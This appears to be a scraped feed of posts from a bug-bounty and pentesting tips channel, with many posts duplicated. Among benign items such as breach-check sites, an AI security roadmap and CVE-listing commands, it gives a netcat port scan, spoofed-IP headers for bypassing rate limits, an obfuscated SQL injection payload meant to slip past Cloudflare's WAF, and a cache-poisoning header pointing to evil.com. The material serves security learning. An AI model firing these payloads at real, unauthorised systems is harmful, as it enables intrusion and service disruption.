We’re going live now! 🚀
Click the link below to join the session instantly.👇🏻
https://meet.google.com/fct-rsxg-ofh
Click the link below to join the session instantly.👇🏻
https://meet.google.com/fct-rsxg-ofh
Quick Port Scan Without Nmap❗️❓
nc -zv abc.com 1-1000
Useful when Nmap is blocked.
Lightweight ≠ useless.✌🏻
#Pentesting #Networking #HacklidoTips
nc -zv abc.com 1-1000
Useful when Nmap is blocked.
Lightweight ≠ useless.✌🏻
#Pentesting #Networking #HacklidoTips
👍4
Bypassing Rate Limit Protection🧑🏻💻👩🏻💻
Add these headers in your request [through burp suite]✌🏻
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
#BugBounty #WebSecurity #HacklidoTips
Add these headers in your request [through burp suite]✌🏻
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
#BugBounty #WebSecurity #HacklidoTips
❤4
Breach Data Check websites
1. Have I Been Pwned [haveibeenpwned.com]
2. Firefox Monitor [monitor.mozilla.org]
3. Data Breach [databreach.com]
4. LeakCheck [leakcheck.io]
5. Quick Heal Data Breach Checker [https://www.quickheal.co.in/data-breach-checker]
#DataLeaks #Cybersecurity #HacklidoTips #Hacklido
1. Have I Been Pwned [haveibeenpwned.com]
2. Firefox Monitor [monitor.mozilla.org]
3. Data Breach [databreach.com]
4. LeakCheck [leakcheck.io]
5. Quick Heal Data Breach Checker [https://www.quickheal.co.in/data-breach-checker]
#DataLeaks #Cybersecurity #HacklidoTips #Hacklido
AI SECURITY ROADMAP💥
Stage 1 : Foundational Principles and Governance
Stage 2 : Threat Modeling and Risk Assessment
Stage 3 : Secure AI Development
Stage 4 : Secure Deployment and Monitoring
Stage 5 : Incident Response and Forensics
Stage 6 : Advanced Security and Future Trends
#AISecurity #AIRoadmap #Roadmap #Hacklido #HacklidoTips
Stage 1 : Foundational Principles and Governance
Stage 2 : Threat Modeling and Risk Assessment
Stage 3 : Secure AI Development
Stage 4 : Secure Deployment and Monitoring
Stage 5 : Incident Response and Forensics
Stage 6 : Advanced Security and Future Trends
#AISecurity #AIRoadmap #Roadmap #Hacklido #HacklidoTips
❤5
Agentic SOCs Explained | The Future of Security Operations
https://www.youtube.com/watch?v=ZxQLbagvyOI
Complete Agentic SOC Roadmap:
https://hacklido.com/blog/1355-agentic-soc-roadmap-from-beginner-to-advanced
https://www.youtube.com/watch?v=ZxQLbagvyOI
Complete Agentic SOC Roadmap:
https://hacklido.com/blog/1355-agentic-soc-roadmap-from-beginner-to-advanced
YouTube
Agentic SOCs Explained | The Future of Security Operations + Complete Learning Roadmap
In this video, we explain what Agentic SOCs are, how they work, and why they represent the future of Security Operations Centers (SOC).
An Agentic SOC uses AI agents and automation to assist SOC analysts with alert triage, investigation, threat hunting,…
An Agentic SOC uses AI agents and automation to assist SOC analysts with alert triage, investigation, threat hunting,…
How I track the latest CVEs — top 20, fast 🔥
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq -r '.cves[:20][]?.cve_id'
==> Want id+summary?
curl -s 'https:/ /cvedb.shodan.io/cves' \
| jq '[.cves
| sort_by(.published? // .Published? // .modified? // "1970-01-01")
| reverse
| .[:20][]? | {cve_id, summary}]'
Note : Make sure you remove the space between https:/ and /cvedb before using the command must be https://
Tool: cvedb.shodan.io
Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
❌ Blocked Payload
(select(0)from(select(sleep(10)))v) → 403 Forbidden
✅ Bypass Payload
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
🔍 This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
❤3
CACHE POISONING QUICK WIN:
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects
Most apps validate X-Forwarded-Host as a single value.
But try this:
X-Forwarded-Host: http://legit.com, http://evil.com
• CDN: Reads first → Allows ✅
• App: Reads last → Injects